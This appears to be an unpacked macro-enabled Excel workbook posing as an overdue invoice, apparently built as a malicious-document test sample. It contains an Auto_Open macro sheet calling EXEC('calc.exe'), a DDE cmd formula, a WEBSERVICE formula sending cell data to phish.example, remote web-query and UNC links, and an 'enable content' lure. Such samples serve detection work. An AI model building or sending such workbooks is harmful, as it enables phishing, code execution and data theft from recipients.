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vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/xl/macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/connections.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.connections+xml"/>
  <Override PartName="/xl/externalLinks/externalLink1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workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><workbookPr/><workbookProtection/><bookViews><workbookView visibility="visible" minimized="0" showHorizontalScroll="1" showVerticalScroll="1" showSheetTabs="1" tabRatio="600" firstSheet="0" activeTab="0" autoFilterDateGrouping="1"/></bookViews><sheets><sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Invoice" sheetId="1" state="visible" r:id="rId1"/><sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Hidden" sheetId="2" state="hidden" r:id="rId2"/><sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Secret" sheetId="3" state="veryHidden" r:id="rId3"/><sheet name="Macro1" sheetId="9" state="hidden" r:id="rIdMacro"/></sheets><externalReferences><externalReference r:id="rIdExt"/></externalReferences><definedNames/><definedNames><definedName name="_xlnm.Auto_Open" hidden="1">Macro1!$A$1</definedName></definedNames><calcPr calcId="124519" fullCalcOnLoad="1"/></workbook>
</file>

<file path=xl/connections.xml><?xml version="1.0" encoding="utf-8"?>
<connections xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <connection id="1" name="Rates" type="4" refreshedVersion="6" background="1" saveData="1">
    <webPr url="https://phish.example/rates.iqy" htmlTables="1"/>
  </connection>
</connection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Macro" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/><Relationship Id="rIdExt" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink1.xml"/><Relationship Id="rIdConn" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/connections" Target="connections.xml"/><Relationship Id="rIdVba" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin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\\phish.example\share\book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Rates"/>
    </sheetNames>
  </externalBook>
</externalLink>
</file>

<file path=xl/macrosheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
  <sheetData>
    <row r="1">
      <c r="A1">
        <f>EXEC("calc.exe")</f>
      </c>
    </row>
    <row r="2">
      <c r="A2">
        <f>HALT()</f>
      </c>
    </row>
  </sheetData>
</xm:macro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ish.example/logi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overdue</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Enable content to see the amount</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3">
        <f>cmd|' /C calc'!A0</f>
        <v/>
      </c>
    </row>
    <row r="4">
      <c r="A4">
        <f>WEBSERVICE("https://phish.example/x?d="&amp;A1)</f>
        <v/>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="inlineStr">
        <is>
          <t>Pay here</t>
        </is>
      </c>
    </row>
  </sheetData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sheet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 hidden sheet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Accounts</dc:creator>
  <dcterms:created xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2026-01-02T03:04:05Z</dcterms:created>
  <dcterms:modified xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2026-01-02T03:04:05Z</dcterms:modified>
</cp:coreProperties>
</file>